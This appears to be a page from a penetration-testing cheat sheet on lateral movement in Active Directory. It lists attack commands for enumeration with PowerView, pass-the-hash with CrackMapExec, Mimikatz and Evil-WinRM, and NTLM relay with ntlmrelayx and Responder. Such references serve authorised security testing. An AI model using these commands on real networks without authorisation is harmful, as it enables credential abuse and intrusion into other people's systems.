Lateral Movement

  1. PowerView Description: Enumerate AD information to identify targets for lateral movement. Tools/Commands:

    • Import-Module PowerView; Get-NetGroupMember -GroupName "Administrators"

    • Get-NetSession

    • Find-DomainShare

  2. Pass-the-Hash (PtH) Description: Authenticate to remote systems using NTLM hashes instead of passwords. Tools/Commands:

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -H <HASH>

    • Mimikatz: sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH>

    • Evil-WinRM: evil-winrm -i <IP> -u <USER> -H <HASH>

  3. NTLM Relay Description: Relay NTLM authentication to authenticate against other systems. Tools/Commands:

    • NTLMRelayX: ntlmrelayx.py -t <target>

    • Responder: responder -I <interface>

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -p <PASS>

PreviousGetting CredentialsNextPrivilege Escalation

Last updated